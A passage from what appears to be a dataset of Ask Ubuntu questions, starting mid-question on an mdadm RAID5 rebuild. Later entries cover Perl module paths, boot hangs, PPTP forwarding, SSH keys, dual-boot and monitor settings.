3907027120*linux raid auto ( fd ) none partition table for /dev/sde first last # type sector sector offset length filesystem type ( id ) flag -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- pri/log 0 2047* 0 # 2048*free space none 1 primary 2048* 3907029167* 0 3907027120*linux raid auto ( fd ) none or actualy if print the partition table as raw data in cfdisk there is some differences but i can not decipher what that means . - > diff sde.raw sdc.raw 1c1 disk drive : /dev/sde -- - disk drive : /dev/sdc 30c30 0x1b0 : 00 00 00 00 00 00 00 00 b7 e9 70 74 00 00 00 20 -- - 0x1b0 : 00 00 00 00 00 00 00 00 4b 0c 58 1c 00 00 00 20 i realized that i could try to copy the mbr from one of the working discs using dd , but still i get the same error even though the partition table is identical in the raw output from cfdisk . $ sudo dd if=/dev/sdd of=/tmp/sdd-mbr.bin bs=512 count=1 $ sudo dd if=/tmp/sdd-mbr.bin of=/dev/sdc bs=512 count=1 $ cat /proc/partitions major minor # blocks name 8 48 1953514584 sdd 8 49 1953513560 sdd1 8 32 1953514584 sdc 8 33 1953513560 sdc1 8 64 1953514584 sde 8 65 1953513560 sde1 now the raw comparison of the partition table gives identical output and the partitions seems to be of the same size but i still get the same error when trying to add /dev/sdc1 to the array . i guess my question is if is there is any way to fix this without having to take the whole array apart and recreate it from scratch ? output from mdadm -d /dev/md_d0 the array is still rebuilding since i added /dev/sdc again . /dev/md_d0 : version : 0.90 creation time : sat aug 14 21:06:13 2010 raid level : raid5 array size : 3907028992 ( 3726.03 gib 4000.80 gb ) used dev size : 1953514496 ( 1863.02 gib 2000.40 gb ) raid devices : 3 total devices : 3 preferred minor : 0 persistence : superblock is persistent update time : fri jan 11 18:36:06 2013 state : clean , degraded , recovering active devices : 2 working devices : 3 failed devices : 0 spare devices : 1 layout : left-symmetric chunk size : 64k rebuild status : 53 % complete uuid : 74998045:22316376:01f9e43d : ac30fbff ( local to host server ) events : 0.19988 number major minor raiddevice state 3 8 32 0 spare rebuilding /dev/sdc 1 8 64 1 active sync /dev/sde 2 8 48 2 active sync /dev/sdd i realize now that it looks like the whole array is made up of the actual devices rather than the partiotions , then the question is why sdd1 & sde1 partitios are left on the harddrives and over written on /dev/sdc as soon as i add it to the array .
239975	perl does n't include directory	i have a problem with perl5 with ubuntu . i 've got a script , in which i include several directories . when starting the script , the shell returns ca n't locate xml/twig.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl ) at /root/cron/bin/xml-gp-data.pl line 9 . begin failed -- compilation aborted at /root/cron/bin/xml-gp-data.pl line 9 . alright , so that means , perl does n't find that directory . i 've checked the directory and the file . its path is /root/perl5/lib/perl5/xml/twig.pm the code i use to include that directory and file is use strict ; use warnings ; use dbi ; use lib qw ( /root/perl5/lib/perl5 ) ; use xml : :twig ; use data : :dumper ; use lib qw ( /root/perl5/lib/perl5/ ) ; i did n't write that script myself , so i ca n't tell you , why it is included twice : -p still i do n't understand , why perl ca n't find xml/twig.pm . it is exactly where i told perl to look for it . any ideas why this does n't work and how i can correct it ?
239980	how to make bluetooth work on thinkpad t410 ?	i 'm using ubuntu 12.10 and i have been trying to make my new keyboard ( logitech k810 ) and nokia phone 700 , work with my thinkpad t410 . it just does not work . i have tried the instructions mentioned over here but it still does n't work . as for the phone it says that the phone is paired but then gives an error message when i try to transfer files and unexpectedly shuts down . any solutions ? i 'm desperate to make this keyboard work , and i really do n't want to revert to windows !
239985	system wo n't shut down properly , stays in the plymouth screen	i have an older computer that i got from work when we upgraded to newer ones . i do n't know the brand , it 's kind of a mix and matched machine , but i can get some better info if necessary . anyway , i try to shut it down properly from the shut down button in what i call the `` start '' menu in the upper right hand corner of the screen . however , it just goes to the purple screen with the word `` ubuntu '' with the 5 red/white dots below it , and stays there all night . the only way to shut it down is to unplug it or turn off the switch on the power supply . is this a ubuntu issue or something in the bios ? i 'm running 12.04.1 . the processor is an amd sempron 2600+ it had windows xp on it previously , and i do n't think it had this problem with windows , but i 'm not certain because i installed ubuntu on it almost as soon as i got it . any help is appreciated . thanks !
239991	12.10 on legacy equipment - compiz compatibility	i have tried ( and failed ) to install ubuntu 12.10 on a legacy hp/compaq workstation ( an evo pro ) . this did not surprise me , i 'd guessed at a 30:70 success : fail ratio and was right . the issue is running compiz into a generic driver , and on into legacy firmware . i 'd done by best , the firmware revision of the box was the latest , but this was released around the xp/vista transition . the feeling is that 12.10 is developed around new graphics features , and simply does not want to know about legacy display adapters . if this is so , then frankly i am on-side and support this position . my solution was to do what i 'm supposed to do and use 12.04 . its a pity that ! 2.10 has no 2g or legacy support , but understandable none the less . should however this be implicit on the tin ? regards and thanks / ed
239998	ca n't get past boot menu after wubi installation	i just tried to install ubuntu 12.10 using the windows installer from the ubuntu website on my windows 7 home premium asus gamers laptop and while it appeared to install correctly , when i rebooted the laptop and picked ubuntu from the menu , it just re-displays the boot menu . does anyone know what i need to do to fix this ? here is the windows boot manager screen i am seeing : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer 2 . choose your language settings , and then click `` next '' . 3 . click `` repair your computer '' . if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info the selected entry could not be loaded because the application is missing or corrupt . does anyone know how to fix this ? should i uninstall ubuntu and try again ?
239999	pendrive not detecting after formatting disk utility	after running sudo fdisk -l : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc40dc40d device boot start end blocks id system /dev/sda1 * 1 3824 30716248+ 7 hpfs/ntfs /dev/sda2 3825 19341 124639233 5 extended /dev/sda4 19342 19457 927734 82 linux swap / solaris /dev/sda5 3825 19341 124639232 83 linux disk /dev/sdb : 8011 mb , 8011120640 bytes 247 heads , 62 sectors/track , 1021 cylinders units = cylinders of 15314 * 512 = 7840768 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ee4ed device boot start end blocks id system i ca n't find /dev/sdb*
240002	how to safely uninstall ubuntu and restore windows 8 ?	how to uninstall the grub and restore the windows 8 system with secure boot and uefi ?
240003	how to boot as root without password on a headless ubuntu 11.04 ?	i 'm using a pandaboard as a closed system ( no ethernet , wireless , or display ) which runs ubuntu 11.04 server edition . i have a external power switch and i would like to boot up the system with this switch and launch a program automatically . that means i need to get around the login procedure . on top i need sudo rights to launch the program . would be great to get your help . side question : at the moment i login in as a normal user and use $ sudo su to get root rights . but when i want to login as root directly it says that my password is incorrect . how is that possible ?
240008	how to install oracle 10gr2 ee database on ubuntu 12.04	i 've been able to install an oracle 11gr2 ee database on ubuntu 12.04 by using a tutorial found online . but , i also need to run an oracle 10g database ( not xe ) . anyone know of or have a tutorial for 'how to install oracle 10gr2 enterprise edition database on ubuntu 12.04 ' on a 32 bit machine ?
240010	stuck on ubuntu boot screen clean install	i 'm a new user of linux . i made a clean install of ubuntu 12.04 lts in my notebook dell inspiron n4010 . the intallation went ok , but after restarting it got stuck on the purple screen with the logo . i 've read it may be a graphic card problem , but i do n't know how to solve it . when i press esc during the boot , this is the messaage : fsck de util-linux 2.20.1 fsck de util-linux 2.20.1 /dev/sda1 : clean 156852/2809856 files , 898520/11230208 blocks /dev/sda2 : clean 20/27457776 files , 1774771/109863168 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsysloyd *starting mdns/dns-sd daemon ( ok ) *starting apparmor profiles ( ok ) *starting bluetooh daemon ( ok ) *starting network connection manager ( ok )
240011	how to convert pdf file to an odt file ?	i want to convert a .pdf file to an .odt file so that i can further convert it to a .doc file . is there any software/script that can do this . i have tried to copy the content of the .pdf file and pasted it in liberoffice writer the formatting is n't preserved . the document is confidential so i 'd prefer not to use any on-line service for the conversion . any help is highly appreciated .
240014	check usb health as in windows 7 or 8 .	hi in my college if i insert my usb pen drive on any windows 7 or 8 system then it will automatically starts scanning it and prompt us if it have any errors . like scan and fix errors . is there any such functionality in ubuntu ?
240015	i can not copy and paste between window and ubuntu with lxde desktop	i installed vnc in the vps with ubuntu os , then i installed lxde desktop . i remoted to the desktop of vps via vnc , then i tried to copy between my windows computer and the vps , but it did not work . i tried to search many articles in askubuntu.com and also in google.com but i cound not find the answer . when i tried the comand vncconfig in the vps , it did not work , it says : -bash : vncconfig : command not found i tried to remote vps via both ways : tightvnc and realvnc , but no luck . can you tell me how do i fix it now ?
240018	intermitent facebook connection on empathy	i 'm using empathy on ubuntu 12.04 ( 32 bits ) to connect to `` people near me '' , gtalk and facebook . i 've been using it for about 2 weeks with no issues . then suddenly today the facebook account started dropping , disconnecting and reconnecting all the time . it does connect to facebook ( i 've found lots of other questions here but it 's for people who ca n't connect -- i can connect and see the logged in users ) after about 20 or 30 seconds it gets disconnected , shows up a `` reconnect / edit account '' button on the top of the contacts list . if i either press `` reconnect '' or do n't press it , it keeps retrying , getting reconnected , then dropping connection after a few seconds . i have removed the account and created a new one . it appeared to have worked for about five minutes , then the issue reappeared .
240020	usb mouse sharkoon darkglider not working	software : ubuntu 12.04 lts 35 kernel 3.2.0.35-generic hardware : gigabyte z77-ds3h mainboard ( motherboard ) not working hardware : sharkoon darkglider mouse problem description : usb port is working ( other mice work at the same port ) . mouse does n't do anything , no movement , no buttons , nothing ) . makes no difference if booting while mouse is plugged in or plugging it in when the system is up and running . tryied every usb port works nowhere . only displays current dpi , but it does that whenever power supply is given . same mouse works perfectly under windows 7/8 . the device is recognized as : linux : ~ $ sudo lsusb | grep holtek bus 003 device 005 : id 04d9 : a081 holtek semiconductor , inc. at least that is the device that disappears/reappears when i ( un ) plug the mouse update : according to the manufacturer support the solution is to recompile the kernel with the change : sources-file : include/linux/hid.h -- - # define hid_max_usages 12288 +++ # define hid_max_usages 64000 more info on this solution can be found here : ( opensuse related ) help on ubuntu kernel compiling ( http : //help.ubuntu.com/community/kernel/compile ) i have n't tried it yet . solution : http : //askubuntu.com/a/256770/121531
240023	how to change the units for storage size from gib/mib to gb/mb ( binary prefix ) ?	since a while ago , ubuntu has adopted the policy of requiring decimal and binary prefixes to follow the relevant standards . that 's great , and it clears a lot of confusion as to which prefixes are being used . one of the side effects of this policy seems to be that the decimal prefixes are now used in most of the places by default , such as in nautilus . i find this quite confusing , mainly because the command line tools such as du etc still use the binary prefixes , so one gets different size figures when using different tools ( of course it is easy to tell which one is being used by looking at the number of bytes without the prefix , but it is annoying one is having to do that ) . i would very much like to switch to using the binary prefixes at least in nautilus , but can not seem to find an option for doing so . so to my question . does anybody know how to change the prefixes being used in nautilus ? bonus kudos for a gnome system-wide method .
240027	how to create a .deb package from compiled source files ?	question : mono 3.0 is out , but i found no ppa from where i could install it . there is this one : https : //launchpad.net/~directhex/+ppa-packages but it 's mono 2.10.8.1-5 . i 'm playing with asp.net mvc4 , which is why i need the 3.0 release . now i can compile & install mono 3.0 myself . how i do it , i tutorialized here : http : //ubuntuforums.org/showthread.php ? t=1591370 my problem now is , for every new ubuntu installation i have/want to make ( server , laptop , desktop , renewed installation when hd breakes ) i need to go through this lengthy procedure again . so i want to compile it once , and then upload it to a ppa , so that i ( and everybody else ) do n't need to install it from source again . now the question : the entire build process needs configure run with options , post-configure makefile fixes , post-configure sourcecode fixes , etc . is there an easy way i can create .deb packages from the already compiled files ? so that in the installation script , i only need to write several times : cd package_directory_1/ make install cd package_directory_2/ make install cd package_directory_3/ make install etc . ?
240029	rsa , ssh and repository	i 'm using kubuntu and i generated a key using this command : mkdir ~/.ssh chmod 700 ~/.ssh ssh-keygen -t rsa and i prompted the passphrase and the location here : generating public/private rsa key pair . enter file in which to save the key ( /home/b/.ssh/id_rsa ) : enter passphrase ( empty for no passphrase ) : enter same passphrase again : your identification has been saved in /home/b/.ssh/id_rsa . your public key has been saved in /home/b/.ssh/id_rsa.pub . i send to the host the public key file and when i try to clone the git repository it ask me a password ( of himself , that i do n't have ) . from the other side they say that everything is ok . i have three files in the /.ssh : known_hosts , mykey.txt ( private key ) and mykey.txt.pub ( public key ) . what do i have to do for cloning the repository without that it ask me the password ? edit i do n't know about the server side . i guess they have ssh and they used that command because they did it before .
240030	how to access and copy files from an old/other ubuntu system 's partition ?	i 'm getting permission denied when i try to access my old 10.04 partition . i 'm trying to get into the home folder so that i can back up the data before i do a fresh install of 12.04 . i know the password but not how to get the proper permissions so that i can move stuff via the gui . how can i do this ?
240031	how to use `` read '' to enter a directory `` cd '' to change a file `` chmod +x '' ?	the following bash script exits after the first read -p line . # ! /bin/bash clear echo put me next to your targeted .sh file ! read -p `` press [ enter ] key when placed next to target ... '' echo type your .sh filename ( target.sh ) ... read target chmod +x $ target echo target converted ! read -p `` press [ enter ] key to exit ... '' could somebody explain why the script exits and how do i prevent it ?
240039	unpublish file in ubuntu one	i published some files in ubuntuone - now i wanted to unpublish these files . the files however , are marked as unpublished on my computer and on the u1 web interface . so , i cant unpublish them as they appear as unpublished . the links , however , are still active and accessible and in the ubuntu one app on my pc i can see these files listed in the `` share links '' tab . i also tried to unpublish with u1sdtool -- unpublish-file=path to no avail . further , even if i delete the file from my pc , the link is still active and the file can be still downloaded from the public link ! any idea how to resolve that issue ?
240042	ca n't get my dual monitor settings to `` stick ''	i 'm running kubuntu 12.10 . i have a nvidia gt-430 video card with a large 27 '' 2560x1550 monitor hooked up with dual-link dvi and a smaller 21 '' 1920x1080 monitor hooked up with hdmi . before i log on , the login manager appears to be using both monitors separately ( the list of userids is spread across both monitors ) , but as soon as i log in , it makes them clones of each other . i have to go in and change the `` position '' of the smaller monitor from `` clone of '' to `` left of '' . it does n't matter whether i click `` save as default '' or not , i still have to reset it every time . i look in .kde/share/config/startupconfig and i see what looks like the right commands : # krandrrc display applyonstartup false krandrrc_display_applyonstartup=true # krandrrc display startupcommands '' krandrrc_display_startupcommands='xrandr -- output dvi-i-1 -- pos 1920x0 -- mode 2560x1440 -- refresh 59.9506 xrandr -- output hdmi-0 -- pos 0x0 -- mode 1920x1080 -- refresh 60 xrandr -- output dvi-i-1 -- primary' # krandrrc [ screen0 ] # krandrrc [ screen1 ] # krandrrc [ screen2 ] # krandrrc [ screen3 ] note the -- pos 1920x0 for dvi-i-1 , which is correct . similarly , .kde/share/config/krandrrc also appears to have the correct offset of the big screen to put it to the right of the small screen : [ display ] applyonstartup=true startupcommands=xrandr -- output dvi-i-1 -- pos 1920x0 -- mode 2560x1440 -- refresh 59.9506\nxrandr -- output hdmi-0 -- pos 0x0 -- mode 1920x1080 -- refresh 60\nxrandr -- output dvi-i-1 -- primary [ screen_0 ] outputsunified=false unifiedrect=0,0,0,0 unifiedrotation=1 [ screen_0_output_dvi-i-1 ] active=true rect=1920,0,2560,1440 refreshrate=59.9505500793457 rotation=1 [ screen_0_output_hdmi-0 ] active=true rect=0,0,1920,1080 refreshrate=60 rotation=1 [ screen_0_output_hdmi-1 ] active=true rect=0,0,1920,1080 refreshrate=60 rotation=1 how can i get this working the way it 's supposed to ? i 'd like to get this working because in a month or two i 'm going to buy a second gt-430 and a second 27 '' monitor , and i 'd like to have this all working .
240043	software center states `` the package is of bad quality '' - what does it mean ?	i 'm trying to author a .deb package , and with the one i have now , when i install it on ubuntu 12.10 i get the next error : the package is of bad quality but when i expand the details nothing is listed . i want to post a screen-shot , but i 'm not allowed as a new user . any ideas ?
240045	is 12.04 really stable ?	i left windows and came to ubuntu for just 1 reason : stable system . i know i am new to ubuntu but what i understand about stability is whatever happened in application never should hangs the whole system so yesterday i was facing issue with virtualbox so when i run the win7 system i got my real ubuntu 12.04 system totally hang ( no control at all ) - i already solved this but i am not happy as i did n't got any solution but just press the power button for like 12 sec . ( so any suggestions about what to do when face something like that in ubuntu ? ) today i noticed that when i came to plug out my usb headphone+mic i got black screen with a lot of statements and nothing to do ( any advice ? ) one of those statements was : kernel panic - not syncing ; fatel exception in interrupt please advice , and let me know if i need to re-install my ubuntu system as i played a lot in this copy like trying to install all stuff like gnome , xface , lubuntu , and so forth .
240049	ubuntu extremely slow on macmini	so i have an older macmini . it 's not the world 's greatest machine , but it does n't suck that badly : intel® core™2 cpu t5600 @ 1.83ghz × 2 , 1gig ram i have installed ubuntu on much weaker machines with acceptable performance . i have installed windows 7 on this machine with acceptable performance . but ubuntu 12.04 ? slow . horribly slow . loading the system dialog is a 45 second affair . starting chrome is a 2 minute affair . launching ubuntu software center ? 5+ minutes . something obviously is n't doing what it 's supposed to be . any ideas where to start looking ?
240051	is it possible to read from a file from a cinnamon applet ?	is it possible somehow to read from a local file ( or a file in name @ domain directory ) some info from the applet ? so , i need to extract information from local file , that will be created in local directory of applet . ( name @ domain ) . note : file will be created during applet work for this reason , i suppose to create .js like this : javascript file : const myinfo = { info : '' info '' } and then import it in applet.js
240052	wired connection 1 connection established '' but still there is no internet	this is the glorious day , i stated using ubuntu with 12.10 . i am using connection for internet . when connected wire in my laptop . it saying `` wired connection 1 connection established '' but still there is no internet.when i was using windows 8. windows asked for username and password that is given my service provider . but when i click on connection information . its show connection information . such as general interface ethernet ( eth0 ) hardware address : ... ... ... ... .. ; driver : e100 speed : ... . security : ... ipv4 1.ip address : ... ... ... ... . broadcast address : ... ... subnet mark : ... ... ... ... defult route : ... ... ... .. primary dns ... ... ... ... . secondary dns : ... ... ... . ipv6 i am using hp pavilion dv6000 ,
240057	how to tell which packages are available to install using apt-get ?	using ubuntu software center i can perform a search on an approximate package name and get the matching packages list to select from . if i work on a remote machine via ssh ( i.e . command line only ) , how do i perform such a search ?
240059	windows 8 & ubuntu 12.04 dual boot menu does not load	i 've read abt the ton of complications/problems ppl are facing with uefi when installing ubuntu alongside windows , but i have n't been able to find a solution to the one i encountered . i have a windows 8 os and we installed ubuntu 12.04 next to it . however , the dual boot menu did not pop up upon reboot . it loaded windows directly . ( secure boot & rapid technologies are disabled ) . after some research & forum reading , we verified that ubuntu was indeed present in the efi partition and we ran boot-repair . eventually , the boot menu appeared , but it did so at every second reboot ( from a shutdown not a restart ) . then , it disappeared again and the laptop goes directly into windows . when the dual boot menu appeared , we went into ubuntu and life was good so the installation -or some parts of it- worked ... but how do i now get the dual boot menu to appear as it 's supposed to ? furthermore , i read that with windows 8 the dual boot menu becomes graphical ... but we just had the regular old list . any tips ? ? thanks !
240063	can i change file systems inside of partitions within gparted ?	i 'm looking to share documents , pictures , etc . between windows 7 and ubuntu 12.04.1 . i have an extended primary partition ( sda4 ) that is comprised of a swap partition ( sda5 ) and a `` /home '' mount point storage partition ( sda6 ) . this sda6 storage partition is a ext4 file system . as i understand it , in order for windows 7 to recognize the data , this storage partition needs to be an ntfs format . can this ext4 format ( sda6 ) be changed to ntfs using the gparted partition editor ? if not , is there another way to make this happen ? thanks so much in advance .
240074	can adobe reader run from 64-bit ubuntu ?	i installed it but when i try to run it nothing shows . on adobe 's requirements for ubuntu page it says : `` 32-bit intel速 pentium速 processor or equivalent '' can i infer from it that adobe reader does n't run on 64-bit processors in ubuntu ?
240076	ubuntu 12.04 on asus x55c	i 've bought new asus x55c laptop ( link ) , with no os preinstaled ( only dos ) . i 've installed win7 , since i got in box cd with win7 drivers , and everything works fine . now , i want to install ubuntu 12.04 ( dualboot ) , and i tried it ( from cd , without installation ) . i noticed that my network is n't worknig ( wifi , lan ) , keyboard commands does n't work fine , etc ... i googled for ubuntu drivers , but all i 've founded is this link . my question is this : can anyone tell me is ubuntu going to work fine ( network , keyboard , ... ) when i install it , although it does n't work on `` try ubuntu '' mode ? i would n't like to install os that would n't work . sorry for bad english , and thanks in advance . here is the output of commands you asked for . ubuntu @ ubuntu : ~ $ lspci -n 00:00.0 0600 : 8086:0104 ( rev 09 ) 00:02.0 0300 : 8086:0116 ( rev 09 ) 00:14.0 0c03 : 8086:1e31 ( rev 04 ) 00:16.0 0780 : 8086:1e3a ( rev 04 ) 00:1a.0 0c03 : 8086:1e2d ( rev 04 ) 00:1b.0 0403 : 8086:1e20 ( rev 04 ) 00:1c.0 0604 : 8086:1e10 ( rev c4 ) 00:1c.1 0604 : 8086:1e12 ( rev c4 ) 00:1c.3 0604 : 8086:1e16 ( rev c4 ) 00:1d.0 0c03 : 8086:1e26 ( rev 04 ) 00:1f.0 0601 : 8086:1e59 ( rev 04 ) 00:1f.2 0106 : 8086:1e03 ( rev 04 ) 00:1f.3 0c05 : 8086:1e22 ( rev 04 ) 02:00.0 0280 : 1814:3290 02:00.1 0d11 : 1814:3298 03:00.0 0200 : 1969:1091 ( rev 10 ) and ubuntu @ ubuntu : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7d10000-f7d1ffff *-network unclaimed description : ethernet controller product : ar8161 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list configuration : latency=0 resources : memory : f7c00000-f7c3ffff ioport : e000 ( size=128 )
240080	accessing web resources on a remote server from a local computer	i have installed ubuntu server on my pc , and i want connect via the web browser on a remote computer but i do n't know how to do that . for example , i installed mediawiki and to login from the local computer i navigate to http : //192.168.x.x/wiki , but when i try to connect from a remote computer , entering my external ip or url does n't display the wiki . so what i must to do access the web resources on my local computer from a remote computer ? i 've already googled this problem but i do n't understand a lot . for ex . i tryed to install apache but i do n't understand how configure it . finally i want set the domain like http : //www.trytomakedomain.com/wiki thanks in advance ( ps i 'm new to ubuntu ) : )
240081	no network access through pptp	i would like to be able to connect to the office network and access the internet through that network and the servers within the network . i use a server running ubuntu server ( fully updated ) behind a router which acts as pptp server . it is setup like this : office router delivers ip 's in the range of 192.168.1.1-253 , the router has ip 192.168.1.254 . the ubuntu server running pptp server has ip 192.168.1.102 ( static , delivered by the router ) . home a network using the same range ( 192.168.1.1-255 ) . i tried to connect through ubuntu and macosx , both give the same result . pptp settings /etc/pptpd.conf localip 192.168.1.102 remoteip 192.168.1.110-200 /etc/sysctl.conf net.ipv4.ip_forward=1 /etc/rc.local sysctl -w net.ipv4.ip_forward=1 iptables -t nat -a postrouting -o eth0 -j masquerade /etc/ppp/pptpd-options ms-dns 8.8.8.8 ms-dns 8.8.4.4 ( not really necessary i guess , but just to be sure ) of course i forwarded port 1723 to 192.168.1.102 and opened the port on the ubuntu server ( ufw allow pptp ) current situation i could connect to the vpn and also access the internet . according to www.whatismyip.com i do have the office ip , so that part works . i am able to ping 192.168.1.102 , but not any of the other addresses within the network . i just do n't know what to do anymore . i have followed all steps in many tutorials , but that does n't change anything . one suggestion i also tried : sudo iptables -a forward -o ppp+ -i eth0 -s 192.168.1.0/24 -d 192.168.1.0/24 -j accept sudo iptables -a forward -i ppp+ -o eth0 -s 192.168.1.0/24 -d 192.168.1.0/24 -j accept i do n't know exactly what that does , but it did n't work anyways . hopefully somebody can help me out here : ) . thanks for reading so far : ) .
240086	application showing installed but still not showing up in dashboard	i have faced this problem a lot of time . i have installed an app from sw center but its still not showing up in dashboard . like i installed gcc and its showing as installed but not getting how to open it . so tell me how to solve this problem for once and for all .
240089	how to change messaging menu 's indicator icon ?	how to change the recent notifications indicator icon ? i do not really like the default icon which turns into a green mailbox when i have an unread notification .
240090	how do i write a linux device driver ?	is it difficult for a person who knows average c programming ( not cs major ) to get started with linux device drivers development ? but knows assembly programming.so , how one should get started in this case ?
240101	is there a way that i can make people have to input an administrators password to change the desktop background ?	i have a problem of lots of people changing my desktop background . is there a way that i can make people have to input an administrators password to change the desktop background . i am running ubuntu 12.04 lts with unity 2d .
240107	run startup applications after suspend	is there a way to load the startup applications upon return from suspend . my problem is that i have the line xset m 200 1 in my start-up applications , but it wo n't load after suspend . it loads fine at start-up though .
240109	why do i get : failed to download repository information !	so i am getting this error when i try to run the system updater : failed to download repository information check you internet connection w : failed to fetch https : //installer.id.ee/media/ubuntu/dists/quantal/main/binary- amd64/packages the requested url returned error : 404 not found w : failed to fetch https : //installer.id.ee/media/ubuntu/dists/quantal/main/binary- i386/packages the requested url returned error : 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i have done : sudo apt-get clean sudo apt-get update sudo apt-get upgrade i also changed the server from where ubuntu tries to fetch them and after all this the problem still persists . i notice that the problem is caused by intaller.id.ee i tried to install id-card software from there but it failed to download it and the trace was still left onto my computer . i did wget to the address they use . i think if i would remove that url from the listing the problem would be solved but i have no idea how to do that as i am not familiar with all the commands yet . so what do you guys think ? might that be the problem ? if so then how do i go with it ?
240119	no xelatex in texlive 2012	just installed texlive 2012 on my ubuntu and i have no xelatex . there is one in mac distribution . is ubuntu 's `` special '' ? i 'll be glad for help .
240124	what do i type to blacklist b43 in an installed ubuntu system ?	initial boot into 12.04 on newworld ppc mac . b43 driver is missing . to run the live cd i booted with b43.blacklist=yes install went fine . now i am stuck at boot . i want to boot regular linux ( as it 's installed , not the live cd ) , just without loading load b43 . i do n't know how to tell it to do that . is it something like boot linux b43.blacklist=yes ? linux b43 ... ? how should i do this ?
240125	trying to install 12.10 does not have option to run alongside of windows , i have 444780 mb of shrink space	windows says i can shrink the space . should i use their option or is that too risky also will this change allow me to run ubuntu alongside of windows ?
240126	ubuntu 12.04 + xbmc direct to hdmi workspace	admitted ubuntu noob , and frustrated i ca n't find an answer i have ubuntu installed , and the geforce gt 610 video card . i have an hdmi cable connected to my home theater . i can play sound , and can see a workspace on my hdmi tv . i can also open an application on my local workspace and drag it to the hdmi tv workspace . i have installed xbmc , but it open full screen and i can not `` drag '' it to the hdmi tv workspace . questions : 1 . how do i open a video full screen on the tv workspace ? 2 . how do i `` direct '' or `` target '' xbmc to open on the tv workspace ? 3 . how do i direct all sound and video to the hdmi tv , and keep other sound on the local desktop speakers & monitor 4 . when i turn the tv off the hdmi workspaces disappear . can i prevent that ? here is my setup . ubuntu 12.04 ( 3.2.0-29 ) amd fx cpu video card : geforce gt 610 with the nvidia_current driver any help would be appreciated . thank you william -
240127	configure ubuntu with two network adapters and a switch	after 4 hours of trying to configure this i 'm getting mad . i 've the next setup : eth0 : is the on board lan adapter and this one connect directly to a switch . eth1 : is the lan adapter ( pci card ) that connects directly to the main router and internet . i 'm trying to connect multiple machines to this computer running a dhcp-server ( isc-dhcp-server ) on it . and then configure the other machines to boot using lan . this my current settings for interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo eth1 eth0 iface lol inet loopback iface eth1 inet static address 192.168.0.200 netmask 255.255.255.0 gateway 192.168.0.1 network 192.168.0.0 dns-nameservers 192.168.0.1 8.8.8.8 iface eth0 inet static address 10.0.0.100 netmask 255.255.255.0 gateway 10.0.0.1 network 10.0.0.0 note : with this configuration nothing works at all . if i remove the configuration of eth0 i can connect to internet an my router without problems . otherwise nothing works . and this my configuration to the dhcp : ddns-update-style none ; option domain-name-servers 8.8.4.4 , 8.8.8.8 ; default-lease-time 600 ; max-lease-time 7200 ; # if this dhcp server is the official dhcp server for the local # network , the authoritative directive should be uncommented . # authoritative ; log-facility local7 ; subnet 10.0.0.0 netmask 255.255.255.0 { interface eth0 ; range 10.0.0.100 10.0.0.200 ; option routers 10.0.0.2 ; option subnet-mask 255.255.255.0 ; option broadcast-address 10.0.0.254 ; option domain-name-servers 10.0.0.1 , 10.0.0.2 ; option ntp-servers 10.0.0.1 ; option netbios-name-servers 10.0.0.1 ; option netbios-node-type : 8 ; } thanks in advance !
240128	ubuntu 12.04 hangs on boot , wo n't mount mdadm array	i have two problems that i believe are related . one has been happening for years through multiple versions of ubuntu ( at least from 11.10 to 12.04 ) , the other is new since i update the kernel . first problem first , this is the one that 's been happening for years . during a normal boot the system will appear to hang on the `` purple '' screen , but really it 's just at an initramfs prompt behind the purple screen . i usually type `` exit '' and the boot continues as planned , loading into ubuntu within a second or two . i 've always had the suspicion that this hang was due to my novice setup of a raid array a couple years ago . something went wrong , i deleted the array and started over and the second time everything was fine . but , that 's about the time that this problem started happening . i 've lived with it because i only reboot my computer a couple times a year . i can live with typing `` exit '' a couple times a year ... second problem , i updated to the latest kernel ( something i hate doing because it always gives me trouble , but the tinkerer in me insists that i get the latest updates ... ) and now after the first error i type exit and then the system hangs showing numerous warnings none of which i feel have anything to do with the actual problem because none of them are about mounting /dev/md/1 ( even though it started as /dev/md1 when i created it the array is now known as /dev/md/1 ) . if i change my /etc/fstab to comment out the line about mounting /dev/md/1 everything will start up ok. once ubuntu loads up i have to stop /dev/md1 ( that is not a typo ) and then mdadm -- assemble -- scan will properly start /dev/md/1 . i then edit my /etc/fstab so that /dev/md/1 is a device to mount and then run mount -a nowhere can i find why /dev/md1 is starting but /dev/md/1 is not . i do n't know how to find the logs for previous boots or else i would put the warnings that i 'm seeing during boot ... in order to boot into ubuntu ok i go to a recovery shell remount the filesystem as read/write , edit /etc/fstab to remove the /dev/md/1 mount and then continue with the boot .
240129	multimedia keys do n't actually change volume ( even though the osd shows a change )	in my xubuntu 12.10 install , using the multimedia keys does n't actually have any effect . even though the osd shows changes in volume , the actual volume does n't change . the same thing applies to the mute button . i do n't want a specific application 's volume to be changed - i want the system-wide volume to be increased/decreased/muted . i looked at threads such as this one , but they did n't help . also , i 'm seeing this issue on a system-wide basis , not just in certain situations , like when playing youtube videos .
